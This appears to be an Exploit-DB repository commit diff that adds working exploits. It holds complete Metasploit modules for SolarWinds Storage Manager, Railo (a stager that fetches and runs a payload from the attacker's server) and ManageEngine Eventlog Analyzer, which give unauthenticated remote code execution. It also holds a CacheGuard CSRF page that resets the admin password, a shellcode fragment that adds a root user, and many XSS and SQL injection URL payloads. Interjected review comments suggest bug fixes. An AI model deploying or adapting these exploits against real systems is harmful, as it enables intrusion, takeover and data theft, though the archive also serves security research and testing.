Updated 09_17_2014

Offensive Security 2014-09-17 04:44:23 +00:00
parent 1d4c17cad7
commit d1f84651f9
23 changed files with 1238 additions and 2 deletions

@ -31197,3 +31197,24 @@ id,file,description,date,author,platform,type,port
34644,platforms/php/webapps/34644.txt,"Silurus Classifieds wcategory.php ID Parameter XSS",2009-08-06,Moudi,php,webapps,0
34645,platforms/php/webapps/34645.txt,"Silurus Classifieds search.php keywords Parameter XSS",2009-08-06,Moudi,php,webapps,0
34646,platforms/php/webapps/34646.txt,"Blog Ink (Blink) Multiple SQL Injection Vulnerabilities",2009-08-03,Drosophila,php,webapps,0
34649,platforms/php/webapps/34649.txt,"Netautor Professional 5.5 'login2.php' Cross Site Scripting Vulnerability",2010-09-17,"Gjoko Krstic",php,webapps,0
34650,platforms/php/webapps/34650.txt,"e-Soft24 Flash Games Script 1.0 Cross Site Scripting Vulnerability",2009-08-30,"599eme Man",php,webapps,0
34651,platforms/php/webapps/34651.txt,"e-Soft24 Jokes Portal Script Seo 1.0 Multiple Cross Site Scripting Vulnerabilities",2009-08-30,"599eme Man",php,webapps,0
34652,platforms/php/webapps/34652.txt,"e-Soft24 PTC Script 1.2 'login.php' Multiple Cross Site Scripting Vulnerabilities",2009-08-30,"599eme Man",php,webapps,0
34653,platforms/php/webapps/34653.txt,"e107 0.7.23 Multiple SQL Injection Vulnerabilities",2010-09-17,"High-Tech Bridge SA",php,webapps,0
34654,platforms/windows/remote/34654.c,"SWiSH Max3 DLL Loading Arbitrary Code Execution Vulnerability",2010-09-20,anT!-Tr0J4n,windows,remote,0
34655,platforms/php/webapps/34655.txt,"Open Classifieds Multiple Cross Site Scripting Vulnerabilities",2009-08-28,Moudi,php,webapps,0
34656,platforms/php/webapps/34656.txt,"x10 MP3 Automatic Search Engine 1.6.5 includes/video_ad.php pic_id Parameter XSS",2009-08-29,Moudi,php,webapps,0
34657,platforms/php/webapps/34657.txt,"x10 MP3 Automatic Search Engine 1.6.5 linkvideos_listing.php category Parameter XSS",2009-08-29,Moudi,php,webapps,0
34658,platforms/php/webapps/34658.txt,"x10 MP3 Automatic Search Engine 1.6.5b templates/header1.php id Parameter XSS",2009-08-29,Moudi,php,webapps,0
34659,platforms/php/webapps/34659.txt,"x10 MP3 Automatic Search Engine 1.6.5b video_listing.php key Parameter XSS",2009-08-29,Moudi,php,webapps,0
34660,platforms/php/webapps/34660.txt,"x10 MP3 Automatic Search Engine 1.6.5b embed.php name Parameter XSS",2009-08-29,Moudi,php,webapps,0
34661,platforms/php/webapps/34661.txt,"x10 MP3 Automatic Search Engine 1.6.5b info.php name Parameter XSS",2009-08-29,Moudi,php,webapps,0
34662,platforms/php/webapps/34662.txt,"x10 MP3 Automatic Search Engine 1.6.5b lyrics.php id Parameter XSS",2009-08-29,Moudi,php,webapps,0
34663,platforms/php/webapps/34663.txt,"x10 MP3 Automatic Search Engine 1.6.5b adult/video_listing.php key Parameter XSS",2009-08-29,Moudi,php,webapps,0
34666,platforms/php/webapps/34666.py,"ALCASAR <= 2.8.1 - Remote Root Code Execution Vulnerability",2014-09-15,eF,php,webapps,80
34668,platforms/windows/remote/34668.txt,"Http File Server 2.3.x - Remote Command Execution",2014-09-15,"Daniele Linguaglossa",windows,remote,80
34669,platforms/multiple/remote/34669.rb,"Railo Remote File Include",2014-09-15,metasploit,multiple,remote,80
34670,platforms/multiple/remote/34670.rb,"ManageEngine Eventlog Analyzer Arbitrary File Upload",2014-09-15,metasploit,multiple,remote,8400
34671,platforms/java/remote/34671.rb,"SolarWinds Storage Manager Authentication Bypass",2014-09-15,metasploit,java,remote,9000
34672,platforms/linux/webapps/34672.txt,"CacheGuard-OS 5.7.7 - CSRF Vulnerability",2014-09-15,"William Costa",linux,webapps,8090
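Review bot: the id sequence in this range skips 34647, 34648, 34664, 34665 and 34667, and the commit message ("Updated 09_17_2014") does not say whether those entries were withdrawn or are arriving in a separate commit; a one-line mention in the message would save the next reader a search through the archive.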

platforms/java/remote/34671.rb Executable file
@ -0,0 +1,144 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'SolarWinds Storage Manager Authentication Bypass',
'Description' => %q{
This module exploits an authentication bypass vulnerability in Solarwinds Storage Manager.
The vulnerability exists in the AuthenticationFilter, which allows to bypass authentication
with specially crafted URLs. After bypassing authentication, is possible to use a file
upload function to achieve remote code execution. This module has been tested successfully
in Solarwinds Store Manager Server 5.1.0 and 5.7.1 on Windows 32 bits, Windows 64 bits and
Linux 64 bits operating systems.
},
'Author' =>
[
'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['ZDI', '14-299']
],
'Privileged' => true,
'Platform' => %w{ linux win },
'Arch' => ARCH_JAVA,
'Targets' =>
[
['Solarwinds Store Manager <= 5.7.1', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 19 2014'))
register_options(
[
Opt::RPORT(9000)
], self.class)
end
def check
res = send_request_cgi({
'uri' => normalize_uri("/", "images", "..", "jsp", "ProcessFileUpload.jsp"),
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=----#{rand_text_alpha(10 + rand(10))}"
})
if res && res.code == 200 && res.body && res.body.to_s =~ /Upload Successful!!/
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def exploit
jsp_info = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
print_status("#{peer} - Uploading Information Gathering JSP #{jsp_info}...")
if upload(jsp_info, jsp_path)
print_good("#{peer} - JSP payload uploaded successfully")
else
fail_with(Failure::Unknown, "#{peer} - Information Gathering JSP upload failed")
end
res = execute(jsp_info)
if res && res.code == 200 && res.body.to_s =~ /Path:(.*)/
upload_path = $1
print_good("#{peer} - Working directory found in #{upload_path}")
register_file_for_cleanup(::File.join(upload_path, jsp_info))
else
print_error("#{peer} - Couldn't retrieve the upload directory, manual cleanup will be required")
print_warning("#{peer} - #{jsp_info} needs to be deleted manually")
end
jsp_payload = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
print_status("#{peer} - Uploading JSP payload #{jsp_payload}...")
if upload(jsp_payload, payload.encoded)
print_good("#{peer} - JSP payload uploaded successfully")
else
fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed")
end
if upload_path
register_file_for_cleanup(::File.join(upload_path, jsp_payload))
else
print_warning("#{peer} - #{jsp_payload} needs to be deleted manually")
end
print_status("#{peer} - Executing payload...")
execute(jsp_payload, 1)
end
def execute(jsp_name, time_out = 20)
res = send_request_cgi({
'uri' => normalize_uri("/", "images", "..", jsp_name),
'method' => 'GET'
}, time_out)
res
end
def upload(file_name, contents)
post_data = Rex::MIME::Message.new
post_data.add_part(contents,
"application/octet-stream",
nil,
"form-data; name=\"#{rand_text_alpha(4 + rand(4))}\"; filename=\"#{file_name}\"")
res = send_request_cgi({
'uri' => normalize_uri("/", "images", "..", "jsp", "ProcessFileUpload.jsp"),
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'data' => post_data.to_s
})
if res && res.code == 200 && res.body && res.body.to_s =~ /Upload Successful!!/
return true
end
false
end
def jsp_path
jsp =<<-EOS
<%@ page language="Java" import="java.util.*"%>
<%
out.println("Path:" + System.getProperty("server.webapp.root"));
%>
EOS
jsp
end
end
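Review bot: the product name is inconsistent inside the module: 'Name' says "SolarWinds Storage Manager" while the Description says "Solarwinds Store Manager Server 5.1.0 and 5.7.1" and the target entry says "Solarwinds Store Manager <= 5.7.1"; use "Storage Manager" throughout so searches on either string find the module. The Description also needs a grammar pass ("which allows to bypass authentication" -> "which allows authentication to be bypassed"; "is possible to use" -> "it is possible to use"), and the download URL in the header comment is missing its colon ("http//metasploit.com/download").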

@ -17,7 +17,7 @@ open passwd , and write new root user with passwrd ( user: ALI pass: ALI ) , clo
setreuid() , execve('/bin/sh')
root@g3n3rall:~/Desktop/xpl# objdump -d f.o
root@user:~/Desktop/xpl# objdump -d f.o
f.o: file format elf32-i386
@ -190,7 +190,7 @@ Disassembly of section .text:
203: b0 01 mov $0x1,%al
205: b3 01 mov $0x1,%bl
207: cd 80 int $0x80
root@g3n3rall:~/Desktop/xpl#
root@user:~/Desktop/xpl#

platforms/linux/webapps/34672.txt Executable file
@ -0,0 +1,104 @@
I. VULNERABILITY
-------------------------
CSRF vulnerabilities in CacheGuard-OS v5.7.7
II. BACKGROUND
-------------------------
CacheGuard is an All-in-One Web Security Gateway providing firewall,
web antivirus, caching, compression, URL filtering, proxy, high
availability, content filtering, bandwidth saving, bandwidth shaping,
Quality of Service and more.
III. DESCRIPTION
-------------------------
Has been detected a CSRF vulnerability in CacheGuard in
"/gui/password-wadmin.apl"
IV. PROOF OF CONCEPT
-------------------------
The application does not validate the parameter any csrf_token
"/gui/password-wadmin.apl".
<html>
<body onload="CSRF.submit();">
<br>
<br>
<form id="CSRF" action="https://10.200.210.123:8090/gui/password-wadmin.apl"
method="post" name="CSRF">
<input name="password1" value="admin@1234" type=hidden> </input>
<input name="password2" value="admin@1234" type=hidden> </input>
</form>
</body>
</html>
V. BUSINESS IMPACT
-------------------------
CSRF allow the execution attackers to modify settings or change
password of user administrator in CacheGuard, because this functions
are not protected by CSRF-Tokens.
VI. REQUIREMENTS
-----------------------
An Attacker needs to know the IP of the device.
An Administrator needs an authenticated connection to the device.
VII. SYSTEMS AFFECTED
-------------------------
Try CacheGuard-OS v5.7.7
VIII. SOLUTION
-------------------------
All functions must be protected by CSRF-Tokens.
http://www.kb.cert.org/vuls/id/241508
By William Costa
william.costa no spam gmail.com
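Review bot: the PoC form posts only password1 and password2, so the handler behind /gui/password-wadmin.apl accepts a password change without the current password; section VIII should recommend re-authentication (prompting for the current password) for this function in addition to CSRF tokens, since a token alone does not stop a change made over a hijacked session. Section IV's wording is garbled ("does not validate the parameter any csrf_token") and should read that the handler does not require or validate a CSRF token, and section VII ("Try CacheGuard-OS v5.7.7") should state plainly that 5.7.7 was the tested version and whether earlier releases were checked.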

@ -0,0 +1,189 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Railo Remote File Include',
'Description' => '
This module exploits a remote file include vulnerability in Railo,
tested against version 4.2.1. First, a call using a vulnerable
<cffile> line in thumbnail.cfm allows an atacker to download an
arbitrary PNG file. By appending a .cfm, and taking advantage of
a directory traversal, an attacker can append cold fusion markup
to the PNG file, and have it interpreted by the server. This is
used to stage and execute a fully-fledged payload.
',
'License' => MSF_LICENSE,
'Author' => [
'Bryan Alexander <drone@ballastsecurity.net>', # Discovery/PoC
'bperry' # metasploited
],
'References' => [
['CVE', '2014-5468'],
['URL', 'http://hatriot.github.io/blog/2014/08/27/railo-security-part-four/']
],
'Payload' => {
'Space' => 99999, # if there is disk space, I think we will fit
'BadChars' => "",
'DisableNops' => true,
'Compat' => {
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic netcat perl ruby python bash telnet'
}
},
'Platform' => %w( unix ),
'Targets' =>
[
[
'Automatic',
{
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 26 2014'))
register_options(
[
OptString.new('TARGETURI', [true, 'The base URI of the Railo server', '/railo-context/']),
OptInt.new('STAGEWAIT', [true, 'Number of seconds to wait for stager to download', 10])
], self.class)
end
def check
md5 = '6de48cb72421cfabdce440077a921b25' # /res/images/id.png
res = send_request_cgi(
'uri' => normalize_uri('res', 'images', 'id.png') # the targeturi is not used in this request
)
if !res
fail_with(Failure::Unknown, 'Server did not respond')
elsif !res.body
fail_with(Failure::Unknown, "Server responded without a body: #{res.code} #{res.message}")
end
new_md5 = Rex::Text.md5(res.body)
return Exploit::CheckCode::Appears if new_md5 == md5
Exploit::CheckCode::Safe
end
def exploit
if datastore['SRVHOST'] == '0.0.0.0'
fail_with(Failure::BadConfig, 'SRVHOST must be an IP address accessible from another computer')
end
url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s
@shell_name = Rex::Text.rand_text_alpha(15)
stager_name = Rex::Text.rand_text_alpha(15) + '.cfm'
start_service('Uri' => {
'Proc' => proc do |cli, req|
on_request_stager(cli, req)
end,
'Path' => '/' + stager_name
})
start_service('Uri' => {
'Proc' => proc do |cli, req|
on_request_shell(cli, req)
end,
'Path' => '/' + @shell_name
})
wh = '5000' # width and height
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'admin', 'thumbnail.cfm'),
'vars_get' => {
'img' => url + '/' + stager_name,
'height' => wh,
'width' => wh
}
)
if !res
fail_with(Failure::Unknown, 'Server did not respond')
elsif res.code != 500
fail_with(Failure::Unknown, "Server did not respond with the expected HTTP 500: #{res.code} #{res.message}")
end
print_status('Waiting for first stage to download...')
i = datastore['STAGEWAIT']
while !@staged && i > 0
select(nil, nil, nil, 1)
print_status("Waiting for #{i} more seconds...")
i = i - 1
end
@staged = false
if i == 0
fail_with(Failure::Unknown, 'Server did not request the stager.')
end
hash = Rex::Text.md5("#{url + "/" + stager_name}-#{wh}-#{wh}") # 5000 is width and height from GET
hash.upcase!
print_status('Executing stager')
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'admin', 'img.cfm'),
'vars_get' => {
'attributes.src' => '../../../../temp/admin-ext-thumbnails/' + hash,
'thistag.executionmode' => 'start'
}
)
end
def on_request_shell(cli, _request)
print_status('Sending payload')
send_response(cli, payload.encoded, {})
handler(cli)
end
def on_request_stager(cli, _request)
url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + '/' + @shell_name
stager = "<cfhttp method='get' url='#{url}'"
stager << " path='#GetDirectoryFromPath(GetCurrentTemplatePath())#..\\..\\..\\..\\..\\..\\'"
stager << " file='#{@shell_name}'>"
stager << "<cfexecute name='sh' arguments='#{@shell_name}' timeout='99999'></cfexecute>"
png = 'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcS'
png << 'JAAAACklEQVR4nGMAAQAABQABDQottAAAAABJRU5ErkJggg=='
# A very small PNG file
png = Rex::Text.decode_base64(png)
stager.each_byte do |b|
png << b
end
png << 0x00
print_status('Sending stage. This might be sent multiple times.')
send_response(cli, png, 'Content-Type' => 'image/png')
@staged = true
handler(cli)
end
end
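Review bot: the stage-wait loop in `exploit` misreports a stager fetched during the final second: `while !@staged && i > 0` also exits with `i == 0` when on_request_stager ran during the last `select`, and the following `if i == 0` then calls fail_with even though the stage was served. Test the flag rather than the counter, e.g. `staged = @staged`, `@staged = false`, `fail_with(Failure::Unknown, 'Server did not request the stager.') unless staged`. Minor: "atacker" in the Description, and the header comment's download URL is missing its colon ("http//metasploit.com/download").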

@ -0,0 +1,343 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'ManageEngine Eventlog Analyzer Arbitrary File Upload',
'Description' => %q{
This module exploits a file upload vulnerability in ManageEngine Eventlog Analyzer.
The vulnerability exists in the agentUpload servlet which accepts unauthenticated
file uploads and handles zip file contents in a insecure way. By combining both
weaknesses a remote attacker can achieve remote code execution. This module has been
tested successfully on versions v7.0 - v9.9 b9002 in Windows and Linux. Versions
between 7.0 and < 8.1 are only exploitable via EAR deployment in the JBoss server,
while versions 8.1+ are only exploitable via a JSP upload.
},
'Author' =>
[
'h0ng10', # Vulnerability discovery
'Pedro Ribeiro <pedrib[at]gmail.com>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-6037' ],
[ 'OSVDB', '110642' ],
[ 'URL', 'https://www.mogwaisecurity.de/advisories/MSA-2014-01.txt' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Aug/86' ]
],
'DefaultOptions' => { 'WfsDelay' => 5 },
'Privileged' => false, # Privileged on Windows but not on Linux targets
'Platform' => %w{ java linux win },
'Targets' =>
[
[ 'Automatic', { } ],
[ 'Eventlog Analyzer v7.0 - v8.0 / Java universal',
{
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'WfsDelay' => 30
}
],
[ 'Eventlog Analyzer v8.1 - v9.9 b9002 / Windows',
{
'Platform' => 'win',
'Arch' => ARCH_X86
}
],
[ 'Eventlog Analyzer v8.1 - v9.9 b9002 / Linux',
{
'Platform' => 'linux',
'Arch' => ARCH_X86
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 31 2014'))
register_options(
[
Opt::RPORT(8400),
OptInt.new('SLEEP',
[true, 'Seconds to sleep while we wait for EAR deployment (Java target only)', 15]),
], self.class)
end
def get_version
res = send_request_cgi({
'uri' => normalize_uri("event/index3.do"),
'method' => 'GET'
})
if res and res.code == 200
if res.body =~ /ManageEngine EventLog Analyzer ([0-9]{1})/
return $1
end
end
return "0"
end
def check
version = get_version
if version >= "7" and version <= "9"
# version 7 to < 8.1 detection
res = send_request_cgi({
'uri' => normalize_uri("event/agentUpload"),
'method' => 'GET'
})
if res and res.code == 405
return Exploit::CheckCode::Appears
end
# version 8.1+ detection
res = send_request_cgi({
'uri' => normalize_uri("agentUpload"),
'method' => 'GET'
})
if res and res.code == 405 and version == 8
return Exploit::CheckCode::Appears
else
# We can't be sure that it is vulnerable in version 9
return Exploit::CheckCode::Detected
end
else
return Exploit::CheckCode::Safe
end
end
def create_zip_and_upload(payload, target_path, is_payload = true)
# Zipping with CM_STORE to avoid errors decompressing the zip
# in the Java vulnerable application
zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
zip.add_file(target_path, payload)
post_data = Rex::MIME::Message.new
post_data.add_part(zip.pack, "application/zip", 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{Rex::Text.rand_text_alpha(4+rand(4))}.zip\"")
data = post_data.to_s
if is_payload
print_status("#{peer} - Uploading payload...")
end
res = send_request_cgi({
'uri' => (@my_target == targets[1] ? normalize_uri("/event/agentUpload") : normalize_uri("agentUpload")),
'method' => 'POST',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
})
if res and res.code == 200 and res.body.empty?
if is_payload
print_status("#{peer} - Payload uploaded successfully")
end
register_files_for_cleanup(target_path.gsub("../../", "../"))
return true
else
return false
end
end
def pick_target
return target if target.name != 'Automatic'
print_status("#{peer} - Determining target")
version = get_version
if version == "7"
return targets[1]
end
os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}
jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
target_dir = "../../webapps/event/"
if not create_zip_and_upload(os_finder_payload, target_dir + jsp_name, false)
if version == "8"
# Versions < 8.1 do not have a Java compiler, but can be exploited via the EAR method
return targets[1]
end
return nil
end
res = send_request_cgi({
'uri' => normalize_uri(jsp_name),
'method' => 'GET'
})
if res and res.code == 200
if res.body.to_s =~ /Windows/
return targets[2]
else
# assuming Linux
return targets[3]
end
end
return nil
end
def generate_jsp_payload
opts = {:arch => @my_target.arch, :platform => @my_target.platform}
payload = exploit_regenerate_payload(@my_target.platform, @my_target.arch)
exe = generate_payload_exe(opts)
base64_exe = Rex::Text.encode_base64(exe)
native_payload_name = rand_text_alpha(rand(6)+3)
ext = (@my_target['Platform'] == 'win') ? '.exe' : '.bin'
var_raw = rand_text_alpha(rand(8) + 3)
var_ostream = rand_text_alpha(rand(8) + 3)
var_buf = rand_text_alpha(rand(8) + 3)
var_decoder = rand_text_alpha(rand(8) + 3)
var_tmp = rand_text_alpha(rand(8) + 3)
var_path = rand_text_alpha(rand(8) + 3)
var_proc2 = rand_text_alpha(rand(8) + 3)
if @my_target['Platform'] == 'linux'
var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3)
chmod = %Q|
Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path});
Thread.sleep(200);
|
var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3)
cleanup = %Q|
Thread.sleep(200);
Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path});
|
else
chmod = ''
cleanup = ''
end
jsp = %Q|
<%@page import="java.io.*"%>
<%@page import="sun.misc.BASE64Decoder"%>
<%
try {
String #{var_buf} = "#{base64_exe}";
BASE64Decoder #{var_decoder} = new BASE64Decoder();
byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());
File #{var_tmp} = File.createTempFile("#{native_payload_name}", "#{ext}");
String #{var_path} = #{var_tmp}.getAbsolutePath();
BufferedOutputStream #{var_ostream} =
new BufferedOutputStream(new FileOutputStream(#{var_path}));
#{var_ostream}.write(#{var_raw});
#{var_ostream}.close();
#{chmod}
Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});
#{cleanup}
} catch (Exception e) {
}
%>
|
jsp = jsp.gsub(/\n/, '')
jsp = jsp.gsub(/\t/, '')
jsp = jsp.gsub(/\x0d\x0a/, "")
jsp = jsp.gsub(/\x0a/, "")
return jsp
end
def exploit_native
# When using auto targeting, MSF selects the Windows meterpreter as the default payload.
# Fail if this is the case and ask the user to select an appropriate payload.
if @my_target['Platform'] == 'linux' and payload_instance.name =~ /Windows/
fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Linux target.")
end
jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
target_dir = "../../webapps/event/"
jsp_payload = generate_jsp_payload
if not create_zip_and_upload(jsp_payload, target_dir + jsp_name)
fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
end
return jsp_name
end
def exploit_java
# When using auto targeting, MSF selects the Windows meterpreter as the default payload.
# Fail if this is the case and ask the user to select an appropriate payload.
if @my_target['Platform'] == 'java' and not payload_instance.name =~ /Java/
fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Java target.")
end
target_dir = "../../server/default/deploy/"
# First we generate the WAR with the payload...
war_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
war_payload = payload.encoded_war({ :app_name => war_app_base })
# ... and then we create an EAR file that will contain it.
ear_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
app_xml = %Q{<?xml version="1.0" encoding="UTF-8"?><application><display-name>#{rand_text_alphanumeric(4 + rand(32 - 4))}</display-name><module><web><web-uri>#{war_app_base + ".war"}</web-uri><context-root>/#{ear_app_base}</context-root></web></module></application>}
# Zipping with CM_STORE to avoid errors while decompressing the zip
# in the Java vulnerable application
ear_file = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
ear_file.add_file(war_app_base + ".war", war_payload.to_s)
ear_file.add_file("META-INF/application.xml", app_xml)
ear_file_name = rand_text_alphanumeric(4 + rand(32 - 4)) + ".ear"
if not create_zip_and_upload(ear_file.pack, target_dir + ear_file_name)
fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
end
print_status("#{peer} - Waiting " + datastore['SLEEP'].to_s + " seconds for EAR deployment...")
sleep(datastore['SLEEP'])
return normalize_uri(ear_app_base, war_app_base, rand_text_alphanumeric(4 + rand(32 - 4)))
end
def exploit
if datastore['SLEEP'] < 0
print_error("The SLEEP datastore option shouldn't be negative")
return
end
@my_target = pick_target
if @my_target.nil?
print_error("#{peer} - Unable to select a target, we must bail.")
return
else
print_status("#{peer} - Selected target #{@my_target.name}")
end
if @my_target == targets[1]
exploit_path = exploit_java
else
exploit_path = exploit_native
end
print_status("#{peer} - Executing payload...")
send_request_cgi({
'uri' => normalize_uri(exploit_path),
'method' => 'GET'
})
end
end
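Review bot: in `check`, `if res and res.code == 405 and version == 8` compares the String returned by get_version with an Integer, which is never true in Ruby, so the `Appears` branch for 8.1+ is unreachable and every 8.x or 9.x host falls through to `Detected`; change it to `version == "8"`. Related: the `[0-9]{1}` capture in get_version reads only the first digit, so the string range test `version >= "7" and version <= "9"` would misclassify a two-digit major version; capture `[0-9]+` and compare as integers.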

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43290/info
Netautor Professional is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Netautor Professional 5.5.0 is vulnerable; other versions may also be affected.
http://www.example.com/netautor/napro4/home/login2.php?goback=%22%3Cscript%3Ealert%28document.location%29%3C/script%3E

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43297/info
e-Soft24 Flash Games Script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
e-Soft24 Flash Games Script 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/search_results.php?search_id='"><SCRIPT>alert(String.fromCharCode(88%2C83%2C83))<%2FSCRIPT><MARQUEE+BGCOLOR%3D"RED"><H1>Xss<%2FH1><%2FMARQUEE>&search=Search

platforms/php/webapps/34651.txt Executable file
@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/43303/info
e-Soft24 Jokes Portal Script Seo is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
e-Soft24 Jokes Portal Script Seo 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/SearchAction.php?what='"><SCRIPT>alert(String.fromCharCode(88%2C83%2C83))<%2FSCRIPT><MARQUEE+BGCOLOR%3D"RED"><H1>Xss<%2FH1><%2FMARQUEE>&ssub=GO
http://www.example.com/forgot.html => put : '"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><MARQUEE BGCOLOR="RED"><H1>Xss</H1></MARQUEE>
http://www.example.com/scripts/jokes-portal/SearchAction.php?what=%27%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3CMARQUEE+BGCOLOR%3D%22RED%22%3E%3CH1%3EXss%3C%2FH1%3E%3C%2FMARQUEE%3E&ssub=GO

platforms/php/webapps/34652.txt Executable file
@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/43305/info
e-Soft24 PTC Script is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
e-Soft24 PTC Script 1.2 is vulnerable; other versions may also be affected.
http://www.example.com/login.php
1/ Connect you with : '"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><MARQUEE BGCOLOR="RED"><H1>Xss</H1></MARQUEE>
2/ Password Forget : '"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><MARQUEE BGCOLOR="RED"><H1>Xss</H1></MARQUEE>

platforms/php/webapps/34653.txt Executable file
@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/43327/info
e107 is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
e107 0.7.23 is vulnerable; other versions may also be affected.
http://www.example.com/e107_admin/download.php?cat.edit.999999%0Aunion%0Aselect%0A1,2,3,4,5,6,7
http://www.example.com/e107_admin/wmessage.php?create.edit.999999%0Aunion%0Aselect%0A1,2,user%28%29

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43335/info
Open Classifieds is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/buy.php/?page=1>'><ScRiPt %0A%0D>alert(317235523215)%3B</ScRiPt>
http://www.example.com/contact.php?id=1<ScRiPt %0A%0D>alert(345135841734)%3B</ScRiPt>
http://www.example.com/tellafriend.php?id=1>"><ScRiPt %0A%0D>alert(366396570535)%3B</ScRiPt>

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43336/info
x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
x10 Media Automatic MP3 Search Engine 1.6.5 is vulnerable; other versions may also be affected.
http://www.example.com/includes/video_ad.php?pic_id=[XSS]

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43336/info
x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
x10 Media Automatic MP3 Search Engine 1.6.5 is vulnerable; other versions may also be affected.
http://www.example.com/linkvideos_listing.php?category=[XSS]

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43336/info
